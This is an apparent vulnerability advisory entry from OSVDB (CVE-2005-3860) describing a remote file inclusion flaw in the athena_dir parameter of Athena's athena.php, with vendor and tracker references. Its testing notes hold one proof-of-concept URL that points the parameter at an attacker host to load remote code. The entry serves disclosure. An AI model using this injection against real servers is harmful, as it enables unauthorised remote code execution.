Athena athena.php athena_dir Variable Remote File Inclusion

2005-11-26T15:56:38
ID OSVDB:21358
Type osvdb
Reporter OSVDB
Modified 2005-11-26T15:56:38

Description

Manual Testing Notes

http://[target]/path_to_athena/athena.php?athena_dir=http://[attacker]/

References:

Vendor URL: http://sourceforge.net/projects/athena Security Tracker: 1015278 FrSIRT Advisory: ADV-2005-2599 CVE-2005-3860 Bugtraq ID: 15574